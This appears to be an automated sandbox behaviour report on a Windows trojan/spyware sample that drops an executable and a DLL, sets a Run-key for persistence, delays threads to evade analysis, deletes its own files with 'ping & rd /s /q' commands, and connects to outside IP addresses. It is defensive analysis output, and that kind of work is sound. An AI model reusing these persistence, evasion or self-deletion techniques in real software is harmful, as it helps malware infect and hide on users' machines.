Source: otsIBG7J9b.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/3@52/3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000C230 sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA,5_2_1000C230
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004F60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,5_2_10004F60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10006090 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,5_2_10006090
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004B90 AdjustTokenPrivileges,5_2_10004B90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004AA0 CreateToolhelp32Snapshot,5_2_10004AA0
Source: C:\Users\user\Desktop\otsIBG7J9b.exeCode function: 0_2_004013D0 FindResourceA,LoadResource,SizeofResource,LockResource,wsprintfA,wsprintfA,CreateDirectoryA,Sleep,wsprintfA,CreateFileA,WriteFile,CloseHandle,GetModuleFileNameA,wsprintfA,CreateProcessA,0_2_004013D0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\krnaver.com:6520
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Mkrnaver.com:6520
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Users\user\Desktop\otsIBG7J9b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\ufcpp.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe
Source: otsIBG7J9b.exeReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\otsIBG7J9b.exeFile read: C:\Users\user\Desktop\otsIBG7J9b.exe
Source: unknownProcess created: C:\Users\user\Desktop\otsIBG7J9b.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
Source: C:\Users\user\Desktop\otsIBG7J9b.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ufcpp.exe c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
Source: C:\ufcpp.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\otsIBG7J9b.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\otsIBG7J9b.exeSection loaded: mfc42.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\ufcpp.exeSection loaded: apphelp.dll
Source: C:\ufcpp.exeSection loaded: mfc42.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,5_2_100051B0
Source: initial sampleStatic PE information: section where entry point is pointing to: nsp0
Source: otsIBG7J9b.exeStatic PE information: real checksum: 0x1ddae should be: 0x209af
Source: ufcpp.exe.0.drStatic PE information: real checksum: 0x1ddae should be: 0x1dfbc
Source: otsIBG7J9b.exeStatic PE information: section name: nsp0
Source: otsIBG7J9b.exeStatic PE information: section name: nsp1
Source: ufcpp.exe.0.drStatic PE information: section name: nsp0
Source: ufcpp.exe.0.drStatic PE information: section name: nsp1
Source: yhnvs.dll.4.drStatic PE information: section name: nsp0
Source: yhnvs.dll.4.drStatic PE information: section name: nsp1
Source: C:\Users\user\Desktop\otsIBG7J9b.exeCode function: 0_2_004043B0 push eax; ret 0_2_004043DE
Source: C:\ufcpp.exeCode function: 4_2_004043B0 push eax; ret 4_2_004043DE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10010F90 push eax; ret 5_2_10010FBE
Source: otsIBG7J9b.exeStatic PE information: section name: nsp1 entropy: 7.905412884484882
Source: ufcpp.exe.0.drStatic PE information: section name: nsp1 entropy: 7.905412884484882
Source: yhnvs.dll.4.drStatic PE information: section name: nsp1 entropy: 7.935625569193875

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d5_2_1000C230
Source: C:\Users\user\Desktop\otsIBG7J9b.exeFile created: C:\ufcpp.exe
Source: C:\ufcpp.exeFile created: C:\agtve\yhnvs.dll
Source: C:\Windows\SysWOW64\rundll32.exeFile created: c:\agtve\ReadMe.txt

Boot Survival

Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d5_2_1000C230
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgr

Hooking and other Techniques for Hiding and Protection

Source: C:\ufcpp.exe, File deleted: c:\users\user\desktop\otsibg7j9b.exe
Source: unknown, Network traffic detected: HTTP traffic on port 49753 -> 12354
Source: C:\Users\user\Desktop\otsIBG7J9b.exe, Code function: 0_2_00401DE0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401DE0
Source: C:\ufcpp.exe, Code function: 4_2_00401DE0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,4_2_00401DE0
Source: C:\Users\user\Desktop\otsIBG7J9b.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\ufcpp.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe, Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_5-6126
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe, Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\rundll32.exe, Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\rundll32.exe, Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\rundll32.exe, Thread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exe, Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe, Window / User API: threadDelayed 547
Source: C:\Windows\SysWOW64\rundll32.exe, Window / User API: threadDelayed 1277
Source: C:\Windows\SysWOW64\rundll32.exe, Window / User API: threadDelayed 5080
Source: C:\Windows\SysWOW64\rundll32.exe, Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_5-6215
Source: C:\ufcpp.exe, Dropped PE file which has not been started: C:\agtve\yhnvs.dll
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5548, Thread sleep count: 547 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5548, Thread sleep time: -5470000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6096, Thread sleep count: 84 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3848, Thread sleep time: -3000000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2492, Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6860, Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6860, Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692, Thread sleep count: 1277 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692, Thread sleep time: -383100000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1780, Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6036, Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6600, Thread sleep time: -7200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692, Thread sleep count: 5080 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692, Thread sleep time: -1524000000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6860, Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE, Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,5_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,5_2_100052A0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_10006090 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,5_2_10006090
Source: C:\Windows\SysWOW64\rundll32.exe, Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: rundll32.exe, 00000005.00000002.4132116353.0000000002D7B000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: s\Applications\\VMwareHo
Source: rundll32.exe, 00000005.00000002.4132279546.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWrosoft\input\ar-KW\*.*
Source: rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000005.00000002.4132279546.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW(
Source: C:\Users\user\Desktop\otsIBG7J9b.exe, API call chain: ExitProcess graph end node graph_0-1359
Source: C:\ufcpp.exe, API call chain: ExitProcess graph end node graph_4-1555
Source: C:\Windows\SysWOW64\rundll32.exe, API call chain: ExitProcess graph end node graph_5-5399
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_10021806 VirtualProtect 003CB200,00000200,10021770,10021517,?,10021770,00000000,10021517 5_2_10021806
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,5_2_100051B0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 202.108.0.52 80
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 107.163.241.232 12354
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\ufcpp.exe c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe, Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
